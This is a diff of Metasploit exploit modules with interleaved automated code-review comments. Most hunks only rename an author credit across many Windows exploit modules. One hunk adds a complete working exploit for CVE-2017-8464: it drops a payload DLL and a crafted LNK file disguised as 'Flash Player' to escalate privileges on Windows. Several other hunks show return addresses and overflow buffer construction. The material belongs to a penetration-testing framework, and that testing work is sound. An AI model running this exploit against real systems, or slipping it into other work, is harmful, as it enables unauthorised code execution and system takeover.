'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['win'], 'Targets' => [ - # Patrickw - Tested OK-ish 20090702 w2k + # Aushack - Tested OK-ish 20090702 w2k [ 'Universal MDaemon.exe', { 'Ret' => 0x022fcd46 } ], # direct memory jump :( [ 'Debugging test', { 'Ret' => 0x44434241 } ], ], diff --git a/modules/exploits/windows/http/psoproxy91_overflow.rb b/modules/exploits/windows/http/psoproxy91_overflow.rb index 612eae53d7..531044e687 100644 --- a/modules/exploits/windows/http/psoproxy91_overflow.rb +++ b/modules/exploits/windows/http/psoproxy91_overflow.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/http/sambar6_search_results.rb b/modules/exploits/windows/http/sambar6_search_results.rb index 55442c2e0a..403a65471b 100644 --- a/modules/exploits/windows/http/sambar6_search_results.rb +++ b/modules/exploits/windows/http/sambar6_search_results.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', 'Andrew Griffiths ', - 'patrick', # msf3 port + 'aushack', # msf3 port ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/http/savant_31_overflow.rb b/modules/exploits/windows/http/savant_31_overflow.rb index 9225f81aea..03ee643d42 100644 --- a/modules/exploits/windows/http/savant_31_overflow.rb +++ b/modules/exploits/windows/http/savant_31_overflow.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote Due to the limited space available for the payload in this exploit module, use of the "ord" payloads is recommended. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/http/steamcast_useragent.rb b/modules/exploits/windows/http/steamcast_useragent.rb index 5f5ea78a9b..c8a20e5c1a 100644 --- a/modules/exploits/windows/http/steamcast_useragent.rb +++ b/modules/exploits/windows/http/steamcast_useragent.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Author' => [ 'LSO ', # Original exploit module - 'patrick' # Added references and check code. Default target to XP. + 'aushack' # Added references and check code. Default target to XP. ], 'License' => BSD_LICENSE, 'References' => 
diff --git a/modules/exploits/windows/http/webster_http.rb b/modules/exploits/windows/http/webster_http.rb index 4c89c20b47..1b08baab9a 100644 --- a/modules/exploits/windows/http/webster_http.rb +++ b/modules/exploits/windows/http/webster_http.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote the Microsoft Systems Journal in February 1996 titled "Write a Simple HTTP-based Server Using MFC and Windows Sockets". }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2002-2268' ], diff --git a/modules/exploits/windows/http/xitami_if_mod_since.rb b/modules/exploits/windows/http/xitami_if_mod_since.rb index a324b930cf..0c0fdd8874 100644 --- a/modules/exploits/windows/http/xitami_if_mod_since.rb +++ b/modules/exploits/windows/http/xitami_if_mod_since.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote execute a payload remotely. Due to size constraints, this module uses the Egghunter technique. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/iis/ms02_065_msadc.rb b/modules/exploits/windows/iis/ms02_065_msadc.rb index 77cc0768a0..d7d86800cb 100644 --- a/modules/exploits/windows/iis/ms02_065_msadc.rb +++ b/modules/exploits/windows/iis/ms02_065_msadc.rb @@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote the RDS DataStub 'Content-Type' string is overly long. Microsoft Data Access Components (MDAC) 2.1 through 2.6 are known to be vulnerable. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'Platform' => 'win', 'References' => [ @@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote }, 'Targets' => [ - # patrickw tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0 + # aushack tested OK 20120607 w2kpro en sp0 msadcs.dll v2.50.4403.0 [ 'Windows 2000 Pro English SP0', { 'Ret' => 0x75023783 } ], # jmp eax ws2help.dll ], 'DefaultTarget' => 0, 
diff --git a/modules/exploits/windows/iis/msadc.rb b/modules/exploits/windows/iis/msadc.rb index 44c1b79239..8a2b21a780 100644 --- a/modules/exploits/windows/iis/msadc.rb +++ b/modules/exploits/windows/iis/msadc.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote and useful for debugging. Also set NAME to obtain the remote hostname, and METHOD to use the alternative VbBusObj technique. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'Platform' => 'win', 'References' => [ @@ -44,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote ], 'Targets' => [ - # patrickw tested meterpreter OK 20120601 + # aushack tested meterpreter OK 20120601 # nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx # w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp [ 'Automatic', { } ], diff --git a/modules/exploits/windows/imap/mdaemon_fetch.rb b/modules/exploits/windows/imap/mdaemon_fetch.rb index 09e84297c5..f7eac8768d 100644 --- a/modules/exploits/windows/imap/mdaemon_fetch.rb +++ b/modules/exploits/windows/imap/mdaemon_fetch.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote version 9.6.4 by sending an overly long FETCH BODY command. Valid IMAP account credentials are required. Credit to Matteo Memelli }, - 'Author' => [ 'Jacopo Cervini', 'patrick' ], + 'Author' => [ 'Jacopo Cervini', 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/isapi/ms00_094_pbserver.rb b/modules/exploits/windows/isapi/ms00_094_pbserver.rb index f44d9df234..57ce6b7704 100644 --- a/modules/exploits/windows/isapi/ms00_094_pbserver.rb +++ b/modules/exploits/windows/isapi/ms00_094_pbserver.rb 
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote for phone book updates, it is possible to overwrite the stack. This module has only been tested against Windows 2000 SP1. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/ldap/pgp_keyserver7.rb b/modules/exploits/windows/ldap/pgp_keyserver7.rb index 20bccce385..c30ce6ec7a 100644 --- a/modules/exploits/windows/ldap/pgp_keyserver7.rb +++ b/modules/exploits/windows/ldap/pgp_keyserver7.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote against PGP KeyServer v7.0. Due to space restrictions, egghunter is used to find our payload - therefore you may wish to adjust WfsDelay. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/license/calicclnt_getconfig.rb b/modules/exploits/windows/license/calicclnt_getconfig.rb index 48533a760f..8307bc591c 100644 --- a/modules/exploits/windows/license/calicclnt_getconfig.rb +++ b/modules/exploits/windows/license/calicclnt_getconfig.rb @@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', # original msf v2 module - 'patrick', # msf v3 port :) + 'aushack', # msf v3 port :) ], 'License' => MSF_LICENSE, 'References' => @@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote # name, jmp esi, writable, jmp edi #['Automatic', {} ], # - # patrickw - tested OK Windows XP English SP0-1 only 20100214 + # aushack - tested OK Windows XP English SP0-1 only 20100214 ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi 
diff --git a/modules/exploits/windows/license/calicserv_getconfig.rb b/modules/exploits/windows/license/calicserv_getconfig.rb index fefa2db5e5..c73b69a518 100644 --- a/modules/exploits/windows/license/calicserv_getconfig.rb +++ b/modules/exploits/windows/license/calicserv_getconfig.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', # original msf v2 module - 'patrick', # msf v3 port :) + 'aushack', # msf v3 port :) ], 'License' => MSF_LICENSE, 'References' => @@ -50,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote # name, jmp esi, writable, jmp edi #['Automatic', {} ], # - # patrickw - tested OK Windows XP English SP0-1 only 20100214 + # aushack - tested OK Windows XP English SP0-1 only 20100214 ['Windows 2000 English', { 'Rets' => [ 0x750217ae, 0x7ffde0cc, 0x75021421 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP0-1', { 'Rets' => [ 0x71aa16e5, 0x7ffde0cc, 0x71aa19e8 ] } ], # ws2help.dll esi + peb + edi ['Windows XP English SP2', { 'Rets' => [ 0x71aa1b22, 0x71aa5001, 0x71aa1e08 ] } ], # ws2help.dll esi + .data + edi diff --git a/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb new file mode 100644 index 0000000000..6ca5c09d94 --- /dev/null +++ b/modules/exploits/windows/local/cve_2017_8464_lnk_lpe.rb 
@@ -0,0 +1,208 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + include Msf::Post::File + include Msf::Post::Windows::Priv + + attr_accessor :exploit_dll_name + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => 'LNK Code Execution Vulnerability', + 'Description' => %q{ + This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) + that contain a dynamic icon, loaded from a malicious DLL. + + This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is + similar except an additional SpecialFolderDataBlock is included. The folder ID set + in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass + the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary + DLL file. + + The PATH option must be an absolute path to a writeable directory which is indexed for + searching. If no PATH is specified, the module defaults to %USERPROFILE%. 
+ }, + 'Author' => + [ + 'Uncredited', # vulnerability discovery + 'Yorick Koster', # msf module + 'Spencer McIntyre' # msf module + ], + 'License' => MSF_LICENSE, + 'References' => + [ + ['CVE', '2017-8464'], + ['URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464'], + ['URL', 'http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt'], # writeup + ['URL', 'https://msdn.microsoft.com/en-us/library/dd871305.aspx'], # [MS-SHLLINK]: Shell Link (.LNK) Binary File Format + ['URL', 'http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm'], + ['URL', 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf'] + ], + 'DefaultOptions' => + { + 'EXITFUNC' => 'process', + 'FileDropperDelay' => 15, + 'WfsDelay' => 30 + }, + 'Arch' => [ARCH_X86, ARCH_X64], + 'Payload' => + { + 'Space' => 2048 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Windows x64', { 'Arch' => ARCH_X64 } ], + [ 'Windows x86', { 'Arch' => ARCH_X86 } ] + ], + 'DefaultTarget' => 0, # Default target is Automatic + 'DisclosureDate' => 'Jun 13 2017' + ) + ) + + register_options( + [ + OptString.new('FILENAME', [false, 'The LNK file']), + OptString.new('DLLNAME', [false, 'The DLL file containing the payload']), + OptString.new('PATH', [false, 'An explicit path to where the files should be written to']) + ] + ) + + register_advanced_options( + [ + OptString.new('LnkComment', [true, 'The comment to use in the generated LNK file', 'Manage Flash Player Settings']), + OptString.new('LnkDisplayName', [true, 'The display name to use in the generated LNK file', 'Flash Player']) + ] + ) + end + + def check + if session.sys.process['SearchIndexer.exe'] + return Exploit::CheckCode::Detected + end + + Exploit::CheckCode::Safe + end + + def get_name(option, default_ext) + name = datastore[option].to_s.strip + name = "#{rand_text_alpha(16)}.#{default_ext}" if name.blank? + name + end + + def exploit + if is_system? 
+ fail_with(Failure::None, 'Session is already elevated') + end + + if session.platform != 'windows' + fail_with(Failure::NoTarget, 'This exploit requires a native Windows meterpreter session') + end + + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, 'Exploit not available on this system.') + end + + if sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86 + fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86') + elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64 + fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64') + end + + path = ::File.join(Msf::Config.data_directory, 'exploits', 'cve-2017-8464') + arch = target['Arch'] == ARCH_ANY ? payload.arch.first : target['Arch'] + datastore['EXE::Path'] = path + datastore['EXE::Template'] = ::File.join(path, "template_#{arch}_windows.dll") + + path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%") + path.chomp!("\\") + + dll_path = "#{path}\\#{get_name('DLLNAME', 'dll')}" + write_file(dll_path, generate_payload_dll) + + lnk_path = "#{path}\\#{get_name('FILENAME', 'lnk')}" + write_file(lnk_path, generate_link(dll_path)) + register_files_for_cleanup(dll_path, lnk_path) + end + + def file_rm(file) + if file_dropper_delete(session, file) && @dropped_files && file_dropper_deleted?(session, file, true) + @dropped_files.delete(file) + end + end + + def generate_link(path) + vprint_status("Generating LNK file to load: #{path}") + path += "\x00" # Do not use << here + display_name = datastore['LnkDisplayName'].dup << "\x00" # LNK Display Name + comment = datastore['LnkComment'].dup << "\x00" + + # Control Panel Applet ItemID with our DLL + cpl_applet = [ + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x6a, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00 + ].pack('C*') + cpl_applet << [path.length].pack('v') + cpl_applet << [display_name.length].pack('v') + cpl_applet << 
path.unpack('C*').pack('v*') + cpl_applet << display_name.unpack('C*').pack('v*') + cpl_applet << comment.unpack('C*').pack('v*') + + # LinkHeader + ret = [ + 0x4c, 0x00, 0x00, 0x00, # HeaderSize, must be 0x0000004C + 0x01, 0x14, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, # LinkCLSID, must be 00021401-0000-0000-C000-000000000046 + 0x81, 0x00, 0x00, 0x00, # LinkFlags (HasLinkTargetIDList | IsUnicode) + 0x00, 0x00, 0x00, 0x00, # FileAttributes + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # CreationTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # AccessTime + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, # WriteTime + 0x00, 0x00, 0x00, 0x00, # FileSize + 0x00, 0x00, 0x00, 0x00, # IconIndex + 0x00, 0x00, 0x00, 0x00, # ShowCommand + 0x00, 0x00, # HotKey + 0x00, 0x00, # Reserved1 + 0x00, 0x00, 0x00, 0x00, # Reserved2 + 0x00, 0x00, 0x00, 0x00 # Reserved3 + ].pack('C*') + + # IDList + idlist_data = '' + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [0x12 + 2].pack('v') + idlist_data << [ + # All Control Panel Items + 0x1f, 0x80, 0x20, 0x20, 0xec, 0x21, 0xea, 0x3a, 0x69, 0x10, 0xa2, 0xdd, 0x08, 0x00, 0x2b, 0x30, + 0x30, 0x9d + ].pack('C*') + # ItemID = ItemIDSize (2 bytes) + Data (variable) + idlist_data << [cpl_applet.length + 2].pack('v') + idlist_data << cpl_applet + idlist_data << [0x00].pack('v') # TerminalID + + # LinkTargetIDList + ret << [idlist_data.length].pack('v') # IDListSize + ret << idlist_data + + # ExtraData + # SpecialFolderDataBlock + ret << [ + 0x10, 0x00, 0x00, 0x00, # BlockSize + 0x05, 0x00, 0x00, 0xA0, # BlockSignature 0xA0000005 + 0x03, 0x00, 0x00, 0x00, # SpecialFolderID (CSIDL_CONTROLS - My Computer\Control Panel) + 0x14, 0x00, 0x00, 0x00 # Offset in LinkTargetIDList + ].pack('C*') + # TerminalBlock + ret << [0x00, 0x00, 0x00, 0x00].pack('V') + ret + end +end 
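Review bot: In `exploit`, `path = datastore['PATH'] || session.fs.file.expand_path("%USERPROFILE%")` followed by `path.chomp!("\\")` mutates the datastore's own string in place, and an empty PATH string is truthy in Ruby so it skips the %USERPROFILE% fallback and the files land at `\<name>`; handle it the way `get_name` already does: `path = datastore['PATH'].to_s.strip` / `path = session.fs.file.expand_path("%USERPROFILE%") if path.blank?` / `path = path.chomp("\\")`. In `generate_link` the ItemID length fields come from `path.length` and `display_name.length` (character counts) while the data is widened byte-by-byte with `unpack('C*').pack('v*')`, so any non-ASCII character in PATH, DLLNAME, LnkDisplayName or LnkComment makes the length fields disagree with the emitted data and yields invalid UTF-16; either encode with `.encode('UTF-16LE')` and derive the counts from that, or reject non-ASCII input up front. The comment on `'DefaultTarget' => 0, # Default target is Automatic` is stale, since target 0 is 'Windows x64'. `[0x00, 0x00, 0x00, 0x00].pack('V')` for the TerminalBlock only consumes the first array element, so `[0].pack('V')` states what is actually written. `attr_accessor :exploit_dll_name` is neither read nor assigned anywhere in the module and can be dropped.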
diff --git a/modules/exploits/windows/local/ms10_015_kitrap0d.rb b/modules/exploits/windows/local/ms10_015_kitrap0d.rb index f195409a4f..c1152c0670 100644 --- a/modules/exploits/windows/local/ms10_015_kitrap0d.rb +++ b/modules/exploits/windows/local/ms10_015_kitrap0d.rb @@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Local # Validate OS version winver = sysinfo["OS"] - unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows 2008|Windows 7/ + unless winver =~ /Windows 2000|Windows XP|Windows Vista|Windows 2003|Windows .NET Server|Windows 2008|Windows 7/ return Exploit::CheckCode::Safe end diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index 18b58de464..fe21cba6fd 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez. }, - 'Author' => [ 'patrick', 'riaf ' ], + 'Author' => [ 'aushack', 'riaf ' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index 9d7d4f04f9..7a08aeab65 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb +++ b/modules/exploits/windows/misc/bigant_server_250.rb 
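Review bot: The `.` in the added `Windows .NET Server` alternative is an unescaped regex metacharacter, so it matches any single character rather than the literal dot in the product name; write `Windows \.NET Server`. The existing alternatives are unanchored substrings, so the check is deliberately loose, but the escape keeps the intent explicit. The enclosing method (presumably `check`, given the `Exploit::CheckCode::Safe` return) starts and ends outside the hunk.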
@@ -47,8 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - [ 'BigAnt 2.5 Universal', { 'Ret' => 0x0f9a196a } ], # Tested OK (Dr_IDE & patrickw) p/p/r VBAJET32.dll xpsp3 & w2k - [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], # p/p/r Tested OK (patrickw 20090918) + [ 'BigAnt 2.5 Universal', { 'Ret' => 0x0f9a196a } ], # Tested OK (Dr_IDE & aushack) p/p/r VBAJET32.dll xpsp3 & w2k + [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], # p/p/r Tested OK (aushack 20090918) [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], # Should Work ], 'DefaultTarget' => 0, diff --git a/modules/exploits/windows/misc/mirc_privmsg_server.rb b/modules/exploits/windows/misc/mirc_privmsg_server.rb index 57b83c5aef..4c99de4196 100644 --- a/modules/exploits/windows/misc/mirc_privmsg_server.rb +++ b/modules/exploits/windows/misc/mirc_privmsg_server.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote command can be sent, overwriting the stack. Due to size restrictions, ordinal payloads may be necessary. This module is based on the code by SkD. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/misc/netcat110_nt.rb b/modules/exploits/windows/misc/netcat110_nt.rb index 0d01d60312..2244acfbef 100644 --- a/modules/exploits/windows/misc/netcat110_nt.rb +++ b/modules/exploits/windows/misc/netcat110_nt.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote exists when netcat is used to bind (-e) an executable to a port in doexec.c. This module tested successfully using "c:\>nc -L -p 31337 -e ftp". }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb index bb12511682..1143b831a5 100644 
--- a/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb +++ b/modules/exploits/windows/misc/regsvr32_applocker_bypass_server.rb @@ -8,6 +8,9 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Powershell include Msf::Exploit::Remote::HttpServer + include Msf::Module::Deprecated + + deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb') def initialize(info = {}) super(update_info(info, diff --git a/modules/exploits/windows/misc/sap_2005_license.rb b/modules/exploits/windows/misc/sap_2005_license.rb index 9499a77bd6..48a5aec361 100644 --- a/modules/exploits/windows/misc/sap_2005_license.rb +++ b/modules/exploits/windows/misc/sap_2005_license.rb @@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'win', 'Targets' => [ - # patrickw tested OK w2k3sp2 20090910 + # aushack tested OK w2k3sp2 20090910 [ 'Sap Business One 2005 B1 Universal', { 'Ret' => 0x00547b82 } ], # tao2005.dll push esp /ret ], 'Privileged' => true, @@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote sploit = "\x47\x49\x4f\x50\x01\x00\x01\x00" + rand_text_english(1024) sploit << [target.ret].pack('V') # EIP for w2k3sp2 - jacopo (1024) - sploit << [target.ret].pack('V') # EIP for w2k3sp0 - patrickw (1028) + sploit << [target.ret].pack('V') # EIP for w2k3sp0 - aushack (1028) sploit << make_nops(44) + payload.encoded + make_nops(384) print_status("Trying target #{target.name}...") diff --git a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb index 0071bd5bfc..6f46ad6c69 100644 --- a/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb +++ b/modules/exploits/windows/proxy/ccproxy_telnet_ping.rb 
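Review bot: The replacement passed to `deprecated(Date.new(2018, 3, 5), 'exploits/multi/script/web_delivery.rb')` is written as a source file path rather than a module reference; as far as I can tell the framework's deprecation warning prints this string verbatim for users to `use`, where the module is addressed as `exploit/multi/script/web_delivery` (singular type, no `.rb`), so the printed hint would not resolve as written. Confirm against `Msf::Module::Deprecated` and, if so, change the argument to `'exploit/multi/script/web_delivery'`.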
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote Telnet service. The stack is overwritten when sending an overly long address to the 'ping' command. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb index 56024b8e49..b497df5113 100644 --- a/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb +++ b/modules/exploits/windows/proxy/qbik_wingate_wwwproxy.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote HTTP proxy service on port 80, a remote attacker could overflow a buffer and execute arbitrary code. }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/exploits/windows/scada/citect_scada_odbc.rb b/modules/exploits/windows/scada/citect_scada_odbc.rb index b338f9bff0..76bc660f62 100644 --- a/modules/exploits/windows/scada/citect_scada_odbc.rb +++ b/modules/exploits/windows/scada/citect_scada_odbc.rb @@ -19,7 +19,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'KF ', # Original Metasploit module - 'patrick', # Some clean up - I'm sure there's more to be done :) + 'aushack', # Some clean up - I'm sure there's more to be done :) ], 'References' => [ diff --git a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb index 046f18ba69..9fe9b5c6a9 100644 --- a/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb +++ b/modules/exploits/windows/smtp/mailcarrier_smtp_ehlo.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits the MailCarrier v2.51 suite SMTP service. The stack is overwritten when sending an overly long EHLO command. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'License' => MSF_LICENSE, 'References' => [ 
diff --git a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb index 1ab28acb44..de686297fb 100644 --- a/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb +++ b/modules/exploits/windows/smtp/ms03_046_exchange2000_xexch50.rb @@ -22,7 +22,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'hdm', # original module - 'patrick', # msf3 port :) + 'aushack', # msf3 port :) ], 'References' => [ diff --git a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb index 9bdd4bbdbc..59d6666f17 100644 --- a/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb +++ b/modules/exploits/windows/telnet/gamsoft_telsrv_username.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote Other versions may also be affected. The service terminates after exploitation, so you only get one chance! }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'References' => diff --git a/modules/exploits/windows/tftp/attftp_long_filename.rb b/modules/exploits/windows/tftp/attftp_long_filename.rb index 0df62ca875..b9a3802d91 100644 --- a/modules/exploits/windows/tftp/attftp_long_filename.rb +++ b/modules/exploits/windows/tftp/attftp_long_filename.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in AT-TFTP v1.9, by sending a request (get/write) for an overly long file name. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ ['CVE', '2006-6184'], diff --git a/modules/exploits/windows/tftp/dlink_long_filename.rb b/modules/exploits/windows/tftp/dlink_long_filename.rb index 4208af5357..e69459cecd 100644 --- a/modules/exploits/windows/tftp/dlink_long_filename.rb +++ b/modules/exploits/windows/tftp/dlink_long_filename.rb 
@@ -20,7 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Author' => [ 'LSO ', # Exploit module - 'patrick', # Refs, stability, targets etc + 'aushack', # Refs, stability, targets etc ], 'References' => [ diff --git a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb index 749b7163d6..ee103390fe 100644 --- a/modules/exploits/windows/tftp/tftpdwin_long_filename.rb +++ b/modules/exploits/windows/tftp/tftpdwin_long_filename.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending an overly long file name to the tftpd.exe server, the stack can be overwritten. }, - 'Author' => [ 'patrick' ], + 'Author' => [ 'aushack' ], 'References' => [ [ 'CVE', '2006-4948' ], diff --git a/modules/exploits/windows/vnc/winvnc_http_get.rb b/modules/exploits/windows/vnc/winvnc_http_get.rb index 1ceec34c73..824291023b 100644 --- a/modules/exploits/windows/vnc/winvnc_http_get.rb +++ b/modules/exploits/windows/vnc/winvnc_http_get.rb @@ -17,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Remote enabled (non-default), an overly long GET request can overwrite the stack. This exploit does not work well with VNC payloads! }, - 'Author' => 'patrick', + 'Author' => 'aushack', 'License' => MSF_LICENSE, 'References' => [ diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 6622bbfef4..4b20b17172 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 3239 + CachedSize = 3231 include Msf::Payload::Single include 